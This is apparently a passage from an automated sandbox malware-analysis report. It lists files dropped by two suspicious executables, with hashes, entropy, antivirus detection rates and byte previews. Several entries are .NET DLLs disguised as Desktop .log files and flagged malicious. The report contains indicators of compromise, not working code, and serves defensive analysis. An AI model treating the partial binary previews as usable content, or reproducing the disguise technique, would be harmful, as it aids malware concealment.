SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\uvicgdzsD2

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\v7pR7utqBS

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vGHHsj80cA

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vpLwj6wZQE

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wVvAAMGt7r

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\x7EkTf9NEX

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\x9fbOMJRuq

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xM1Nd8MkBx

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xXDO915h2n

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\xfipqq1p8e

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\yGiVj0kfUW

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\DtICHrzA.log

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17% Antivirus: Virustotal, Detection: 25%, Browse
Joe Sandbox View:	Filename: svchost.exe, Detection: malicious, Browse Filename: T7Em03jTPA.exe, Detection: malicious, Browse Filename: yAxKsVPj6r.exe, Detection: malicious, Browse Filename: dump.bin.exe, Detection: malicious, Browse Filename: 8sxCALaAMG.exe, Detection: malicious, Browse Filename: YLICY3GBmX.exe, Detection: malicious, Browse Filename: yX8787W7de.exe, Detection: malicious, Browse Filename: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, Detection: malicious, Browse Filename: hfGA6tjyxY.exe, Detection: malicious, Browse Filename: 3m7cmtctck.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\EqkKdrOv.log

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 67% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\SHKzphsQ.log

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8% Antivirus: Virustotal, Detection: 10%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\TQvqMYlM.log

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8% Antivirus: Virustotal, Detection: 10%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\VaRrMrQM.log

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\cvopZsny.log

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9728
Entropy (8bit):	5.0168086460579095
Encrypted:	false
SSDEEP:	96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
MD5:	69546E20149FE5633BCBA413DC3DC964
SHA1:	29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
SHA-256:	B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
SHA-512:	90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.................=... ...@....... ....................................@..................................<..W....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B.................=......H.......<&.............................................................................................................V...}..................0..C.......(....o.......(....(....o.......(....s......(...........o....o.......0..'.......s.......(....o.....o........,..o......*..................0.............{........&.r...p.{....r;..p(....}.....s....}.....{........[.{.....{....o....(....s....rQ..po.....{.....{....o....(....s....ra..po......{....s....}.....{..........+.{.....{..

C:\Users\user\Desktop\fJkHwTWu.log

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 12% Antivirus: Virustotal, Detection: 20%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\mqRpKNWg.log

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17% Antivirus: Virustotal, Detection: 25%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\nntxgNlb.log

Download File

Process:	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 67% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\uCFUtfTN.log

Download File

Process:	C:\portintosvc\driverInto.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 12% Antivirus: Virustotal, Detection: 20%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

